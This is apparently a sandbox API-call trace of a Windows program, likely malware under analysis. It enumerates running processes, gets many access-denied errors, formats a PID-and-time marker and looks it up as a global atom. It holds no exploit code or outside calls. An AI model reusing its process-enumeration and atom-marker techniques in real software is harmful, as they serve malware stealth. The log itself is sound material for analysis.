	[0128.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.483] CloseHandle (hObject=0x2dc) returned 1
	[0128.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.484] CloseHandle (hObject=0x2dc) returned 1
	[0128.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.485] CloseHandle (hObject=0x2dc) returned 1
	[0128.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.485] CloseHandle (hObject=0x2dc) returned 1
	[0128.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.485] CloseHandle (hObject=0x2dc) returned 1
	[0128.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.486] CloseHandle (hObject=0x2dc) returned 1
	[0128.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.486] CloseHandle (hObject=0x2dc) returned 1
	[0128.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.487] CloseHandle (hObject=0x2dc) returned 1
	[0128.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.487] CloseHandle (hObject=0x2dc) returned 1
	[0128.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.488] CloseHandle (hObject=0x2dc) returned 1
	[0128.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.488] CloseHandle (hObject=0x2dc) returned 1
	[0128.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.488] CloseHandle (hObject=0x2dc) returned 1
	[0128.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.489] CloseHandle (hObject=0x2dc) returned 1
	[0128.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.489] CloseHandle (hObject=0x2dc) returned 1
	[0128.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.490] CloseHandle (hObject=0x2dc) returned 1
	[0128.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.490] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.490] CloseHandle (hObject=0x2dc) returned 1
	[0128.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.490] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.490] CloseHandle (hObject=0x2dc) returned 1
	[0128.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.491] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.491] CloseHandle (hObject=0x2dc) returned 1
	[0128.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.491] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.491] CloseHandle (hObject=0x2dc) returned 1
	[0128.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.491] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.491] CloseHandle (hObject=0x2dc) returned 1
	[0128.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.492] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.492] CloseHandle (hObject=0x2dc) returned 1
	[0128.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.492] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.492] CloseHandle (hObject=0x2dc) returned 1
	[0128.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.492] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.492] CloseHandle (hObject=0x2dc) returned 1
	[0128.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.493] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.493] CloseHandle (hObject=0x2dc) returned 1
	[0128.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.493] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.493] CloseHandle (hObject=0x2dc) returned 1
	[0128.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.494] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.494] CloseHandle (hObject=0x2dc) returned 1
	[0128.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.494] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.494] CloseHandle (hObject=0x2dc) returned 1
	[0128.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.495] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.495] CloseHandle (hObject=0x2dc) returned 1
	[0128.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.495] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.495] CloseHandle (hObject=0x2dc) returned 1
	[0128.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.495] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.496] CloseHandle (hObject=0x2dc) returned 1
	[0128.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.496] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetLastError () returned 0x5
	[0128.497] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.497] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.497] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.498] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.499] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetLastError () returned 0x5
	[0128.500] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.500] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.500] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.501] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.501] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.501] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.501] CloseHandle (hObject=0x2dc) returned 1
	[0128.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.501] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.501] CloseHandle (hObject=0x2dc) returned 1
